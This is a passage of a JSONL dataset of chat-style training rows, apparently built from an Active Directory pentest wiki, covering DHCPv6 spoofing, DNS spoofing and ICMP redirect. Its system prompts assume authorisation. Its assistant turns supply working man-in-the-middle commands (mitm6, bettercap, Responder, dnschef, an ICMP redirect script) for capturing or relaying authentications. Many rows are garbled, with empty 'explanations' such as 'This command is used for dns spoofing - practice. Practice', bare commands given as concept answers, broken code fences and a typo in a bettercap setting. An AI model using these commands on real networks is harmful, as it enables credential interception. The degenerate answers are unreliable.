nor configured. When a Windows machine boots or gets plugged in the network, it asks for an IPv6 configuration through a DHCPv6 request. Since DHCPv6 works in multicast, attackers on the same network can answer the DHCPv6 queries and provide the clients with a specific IP config. The IP config will include a rogue DNS server address (actually, for mitm6, it will include two addresses, one IPv4 and one IPv6). This technique is called DHCPv6 spoofing.\n\nIt is worth to note that DHCPv6 spoofing can be particularly useful for carrying Kerberos relay attacks.", "metadata": {"corpus_index": 822, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain DHCPv6 spoofing - DNS spoofing"}, {"role": "assistant", "content": "Attackers can then proceed to DNS spoofing. Once the clients DNS servers are set through the fake IP config pushed through DHCPv6 spoofing, each client will query the attacker's server for every domain name resolution. The attacker's server will redirect the clients to other rogue servers that will be able to capture or relay authentications."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain DHCPv6 spoofing - DNS spoofing", "response": "Attackers can then proceed to DNS spoofing. Once the clients DNS servers are set through the fake IP config pushed through DHCPv6 spoofing, each client will query the attacker's server for every domain name resolution. The attacker's server will redirect the clients to other rogue servers that will be able to capture or relay authentications.", "metadata": {"corpus_index": 823, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for DHCPv6 spoofing - DNS spoofing?"}, {"role": "assistant", "content": "Attackers can then proceed to DNS spoofing. Once the clients DNS servers are set through the fake IP config pushed through DHCPv6 spoofing, each client will query the attacker's server for every domain name resolution. The attacker's server will redirect the clients to other rogue servers that will be able to capture or relay authentications."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for DHCPv6 spoofing - DNS spoofing?", "response": "Attackers can then proceed to DNS spoofing. Once the clients DNS servers are set through the fake IP config pushed through DHCPv6 spoofing, each client will query the attacker's server for every domain name resolution. The attacker's server will redirect the clients to other rogue servers that will be able to capture or relay authentications.", "metadata": {"corpus_index": 823, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain DHCPv6 spoofing - Practice"}, {"role": "assistant", "content": "> [!WARNING]\n> Combining DHCPv6 spoofing with DNS spoofing can cause temporary but severe disruption in the network. It is highly recommended to target specific addresses and machines.\n\nmitm6 (Python) is an all-in-one tool for DHCPv6 spoofing + DNS poisoning. The following command can be run to make mitm6 redirect internal traffic only.\n\n``bash\nmitm6 --interface eth0 --domain $DOMAIN_FQDN\n`\n\nbettercap (Go) can also be used for DHCPv6 spoofing and DNS spoofing.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain DHCPv6 spoofing - Practice", "response": "> [!WARNING]\n> Combining DHCPv6 spoofing with DNS spoofing can cause temporary but severe disruption in the network. It is highly recommended to target specific addresses and machines.\n\nmitm6 (Python) is an all-in-one tool for DHCPv6 spoofing + DNS poisoning. The following command can be run to make mitm6 redirect internal traffic only.\n\n``bash\nmitm6 --interface eth0 --domain $DOMAIN_FQDN\n`\n\nbettercap (Go) can also be used for DHCPv6 spoofing and DNS spoofing.\n\n``bash", "metadata": {"corpus_index": 824, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for DHCPv6 spoofing - Practice?"}, {"role": "assistant", "content": "> [!WARNING]\n> Combining DHCPv6 spoofing with DNS spoofing can cause temporary but severe disruption in the network. It is highly recommended to target specific addresses and machines.\n\nmitm6 (Python) is an all-in-one tool for DHCPv6 spoofing + DNS poisoning. The following command can be run to make mitm6 redirect internal traffic only.\n\n``bash\nmitm6 --interface eth0 --domain $DOMAIN_FQDN\n`\n\nbettercap (Go) can also be used for DHCPv6 spoofing and DNS spoofing.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for DHCPv6 spoofing - Practice?", "response": "> [!WARNING]\n> Combining DHCPv6 spoofing with DNS spoofing can cause temporary but severe disruption in the network. It is highly recommended to target specific addresses and machines.\n\nmitm6 (Python) is an all-in-one tool for DHCPv6 spoofing + DNS poisoning. The following command can be run to make mitm6 redirect internal traffic only.\n\n``bash\nmitm6 --interface eth0 --domain $DOMAIN_FQDN\n`\n\nbettercap (Go) can also be used for DHCPv6 spoofing and DNS spoofing.\n\n``bash", "metadata": {"corpus_index": 824, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the mitm6 command to dhcpv6 spoofing - practice"}, {"role": "assistant", "content": "mitm6 --interface eth0 --domain $DOMAIN_FQDN"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the mitm6 command to dhcpv6 spoofing - practice", "response": "mitm6 --interface eth0 --domain $DOMAIN_FQDN", "metadata": {"corpus_index": 825, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "mitm6"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform DHCPv6 spoofing - Practice?"}, {"role": "assistant", "content": "mitm6 --interface eth0 --domain $DOMAIN_FQDN"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform DHCPv6 spoofing - Practice?", "response": "mitm6 --interface eth0 --domain $DOMAIN_FQDN", "metadata": {"corpus_index": 825, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `mitm6 --interface eth0 --domain $DOMAIN_FQDN`?"}, {"role": "assistant", "content": "This command is used for dhcpv6 spoofing - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `mitm6 --interface eth0 --domain $DOMAIN_FQDN`?", "response": "This command is used for dhcpv6 spoofing - practice. Practice", "metadata": {"corpus_index": 825, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Configure and start DHCPv6 spoofing"}, {"role": "assistant", "content": "set dhcp6.spoof.domains $DOMAIN_FQDN\ndhcp6.spoof on"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Configure and start DHCPv6 spoofing", "response": "set dhcp6.spoof.domains $DOMAIN_FQDN\ndhcp6.spoof on", "metadata": {"corpus_index": 826, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Configure and start DHCPv6 spoofing"}, {"role": "assistant", "content": "set dhcp6.spoof.domains $DOMAIN_FQDN\ndhcp6.spoof on"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Configure and start DHCPv6 spoofing", "response": "set dhcp6.spoof.domains $DOMAIN_FQDN\ndhcp6.spoof on", "metadata": {"corpus_index": 826, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Configure and DNS DHCPv6 spoofing in the context of penetration testing"}, {"role": "assistant", "content": "set dns.spoof.domains $DOMAIN_FQDN\nset dns.spoot.all true\ndns.spoof on\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Configure and DNS DHCPv6 spoofing in the context of penetration testing", "response": "set dns.spoof.domains $DOMAIN_FQDN\nset dns.spoot.all true\ndns.spoof on\n```", "metadata": {"corpus_index": 827, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Configure and DNS DHCPv6 spoofing?"}, {"role": "assistant", "content": "set dns.spoof.domains $DOMAIN_FQDN\nset dns.spoot.all true\ndns.spoof on\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Configure and DNS DHCPv6 spoofing?", "response": "set dns.spoof.domains $DOMAIN_FQDN\nset dns.spoot.all true\ndns.spoof on\n```", "metadata": {"corpus_index": 827, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about DNS spoofing - Theory"}, {"role": "assistant", "content": "DNS is not multicast or broadcast like LLMNR, NBT-NS or mDNS. In order to answer DNS requests, attacker first need to receive them. For instance, this can be achieved with ARP spoofing or DHCPv6 spoofing. DNS spoofing is basically setting up a DNS server and answering DNS queries obtained through man-in-the-middle technique."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about DNS spoofing - Theory", "response": "DNS is not multicast or broadcast like LLMNR, NBT-NS or mDNS. In order to answer DNS requests, attacker first need to receive them. For instance, this can be achieved with ARP spoofing or DHCPv6 spoofing. DNS spoofing is basically setting up a DNS server and answering DNS queries obtained through man-in-the-middle technique.", "metadata": {"corpus_index": 828, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do DNS spoofing - Theory"}, {"role": "assistant", "content": "DNS is not multicast or broadcast like LLMNR, NBT-NS or mDNS. In order to answer DNS requests, attacker first need to receive them. For instance, this can be achieved with ARP spoofing or DHCPv6 spoofing. DNS spoofing is basically setting up a DNS server and answering DNS queries obtained through man-in-the-middle technique."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do DNS spoofing - Theory", "response": "DNS is not multicast or broadcast like LLMNR, NBT-NS or mDNS. In order to answer DNS requests, attacker first need to receive them. For instance, this can be achieved with ARP spoofing or DHCPv6 spoofing. DNS spoofing is basically setting up a DNS server and answering DNS queries obtained through man-in-the-middle technique.", "metadata": {"corpus_index": 828, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of DNS spoofing - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== Responder\n\nResponder's (Python) DNS server feature can be used to answer DNS queries.\n\n``bash\nresponder --interface \"eth0\"\nresponder -I \"eth0\"\n`\n\n=== dnschef\n\ndnschef (Python) can be used as a DNS server. \n\n`bash\ndnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log\n`\n\n=== bettercap\n\nIn order to spoof DNS requests, bettercap (Go) can be used. This tool can also be used for the first step of ARP spoofing or DHCPv6 spoofing. \n\n`bash\nset dns.spoof.domains $DOMAIN_FQDN\nset dns.spoof.all true\ndns.spoof on\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of DNS spoofing - Practice", "response": "::: tabs\n\n=== Responder\n\nResponder's (Python) DNS server feature can be used to answer DNS queries.\n\n``bash\nresponder --interface \"eth0\"\nresponder -I \"eth0\"\n`\n\n=== dnschef\n\ndnschef (Python) can be used as a DNS server. \n\n`bash\ndnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log\n`\n\n=== bettercap\n\nIn order to spoof DNS requests, bettercap (Go) can be used. This tool can also be used for the first step of ARP spoofing or DHCPv6 spoofing. \n\n`bash\nset dns.spoof.domains $DOMAIN_FQDN\nset dns.spoof.all true\ndns.spoof on\n``\n\n:::", "metadata": {"corpus_index": 829, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out DNS spoofing - Practice during a pentest?"}, {"role": "assistant", "content": "::: tabs\n\n=== Responder\n\nResponder's (Python) DNS server feature can be used to answer DNS queries.\n\n``bash\nresponder --interface \"eth0\"\nresponder -I \"eth0\"\n`\n\n=== dnschef\n\ndnschef (Python) can be used as a DNS server. \n\n`bash\ndnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log\n`\n\n=== bettercap\n\nIn order to spoof DNS requests, bettercap (Go) can be used. This tool can also be used for the first step of ARP spoofing or DHCPv6 spoofing. \n\n`bash\nset dns.spoof.domains $DOMAIN_FQDN\nset dns.spoof.all true\ndns.spoof on\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out DNS spoofing - Practice during a pentest?", "response": "::: tabs\n\n=== Responder\n\nResponder's (Python) DNS server feature can be used to answer DNS queries.\n\n``bash\nresponder --interface \"eth0\"\nresponder -I \"eth0\"\n`\n\n=== dnschef\n\ndnschef (Python) can be used as a DNS server. \n\n`bash\ndnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log\n`\n\n=== bettercap\n\nIn order to spoof DNS requests, bettercap (Go) can be used. This tool can also be used for the first step of ARP spoofing or DHCPv6 spoofing. \n\n`bash\nset dns.spoof.domains $DOMAIN_FQDN\nset dns.spoof.all true\ndns.spoof on\n``\n\n:::", "metadata": {"corpus_index": 829, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the responder command for dns spoofing - practice"}, {"role": "assistant", "content": "responder --interface \"eth0\"\nresponder -I \"eth0\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the responder command for dns spoofing - practice", "response": "responder --interface \"eth0\"\nresponder -I \"eth0\"", "metadata": {"corpus_index": 830, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "responder"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute DNS spoofing - Practice?"}, {"role": "assistant", "content": "responder --interface \"eth0\"\nresponder -I \"eth0\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute DNS spoofing - Practice?", "response": "responder --interface \"eth0\"\nresponder -I \"eth0\"", "metadata": {"corpus_index": 830, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `responder --interface \"eth0\"`?"}, {"role": "assistant", "content": "This command is used for dns spoofing - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `responder --interface \"eth0\"`?", "response": "This command is used for dns spoofing - practice. Practice", "metadata": {"corpus_index": 830, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the dnschef syntax for dns spoofing - practice?"}, {"role": "assistant", "content": "dnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the dnschef syntax for dns spoofing - practice?", "response": "dnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log", "metadata": {"corpus_index": 831, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "dnschef"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out DNS spoofing - Practice during a pentest?"}, {"role": "assistant", "content": "dnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out DNS spoofing - Practice during a pentest?", "response": "dnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log", "metadata": {"corpus_index": 831, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `dnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log`?"}, {"role": "assistant", "content": "This command is used for dns spoofing - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `dnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log`?", "response": "This command is used for dns spoofing - practice. Practice", "metadata": {"corpus_index": 831, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the set command for dns spoofing - practice"}, {"role": "assistant", "content": "set dns.spoof.domains $DOMAIN_FQDN\nset dns.spoof.all true\ndns.spoof on"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the set command for dns spoofing - practice", "response": "set dns.spoof.domains $DOMAIN_FQDN\nset dns.spoof.all true\ndns.spoof on", "metadata": {"corpus_index": 832, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "set"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for DNS spoofing - Practice"}, {"role": "assistant", "content": "set dns.spoof.domains $DOMAIN_FQDN\nset dns.spoof.all true\ndns.spoof on"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for DNS spoofing - Practice", "response": "set dns.spoof.domains $DOMAIN_FQDN\nset dns.spoof.all true\ndns.spoof on", "metadata": {"corpus_index": 832, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `set dns.spoof.domains $DOMAIN_FQDN`?"}, {"role": "assistant", "content": "This command is used for dns spoofing - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `set dns.spoof.domains $DOMAIN_FQDN`?", "response": "This command is used for dns spoofing - practice. Practice", "metadata": {"corpus_index": 832, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dns-spoofing.md", "page_title": "DNS spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ ICMP Redirect in the context of penetration testing"}, {"role": "assistant", "content": "``bash\npython3 tools/Icmp-Redirect.py --interface eth0 --ip $my_ip --gateway $gateway --target $target --route $dnsserver1 --secondaryroute $dnsserver2\n``\n\nneed iptable\n\nhttps://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/nx-os-software/213841-understanding-icmp-redirect-messages.html\n\nResponder/tools/ICMP_Redirect.py"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ ICMP Redirect in the context of penetration testing", "response": "``bash\npython3 tools/Icmp-Redirect.py --interface eth0 --ip $my_ip --gateway $gateway --target $target --route $dnsserver1 --secondaryroute $dnsserver2\n``\n\nneed iptable\n\nhttps://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/nx-os-software/213841-understanding-icmp-redirect-messages.html\n\nResponder/tools/ICMP_Redirect.py", "metadata": {"corpus_index": 833, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/icmp-redirect.md", "page_title": "🛠️ ICMP Redirect", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ ICMP Redirect during a pentest?"}, {"role": "assistant", "content": "``bash\npython3 tools/Icmp-Redirect.py --interface eth0 --ip $my_ip --gateway $gateway --target $target --route $dnsserver1 --secondaryroute $dnsserver2\n``\n\nneed iptable\n\nhttps://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/nx-os-software/213841-understanding-icmp-redirect-messages.html\n\nResponder/tools/ICMP_Redirect.py"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ ICMP Redirect during a pentest?", "response": "``bash\npython3 tools/Icmp-Redirect.py --interface eth0 --ip $my_ip --gateway $gateway --target $target --route $dnsserver1 --secondaryroute $dnsserver2\n``\n\nneed iptable\n\nhttps://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/nx-os-software/213841-understanding-icmp-redirect-messages.html\n\nResponder/tools/ICMP_Redirect.py", "metadata": {"corpus_index": 833, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/icmp-redirect.md", "page_title": "🛠️ ICMP Redirect", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the python3 command to 🛠️ icmp redirect"}, {"role": "assistant", "content": "python3 tools/Icmp-Redirect.py --interface eth0 --ip $my_ip --gateway $gateway --target $target --route $dnsserver1 --secondaryroute $dnsserver2"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the python3 command to 🛠️ icmp redirect", "response": "python3 tools/Icmp-Redirect.py --interface eth0 --ip $my_ip --gateway $gateway --target $target --route $dnsserver1 --secondaryroute $dnsserver2", "metadata": {"corpus_index": 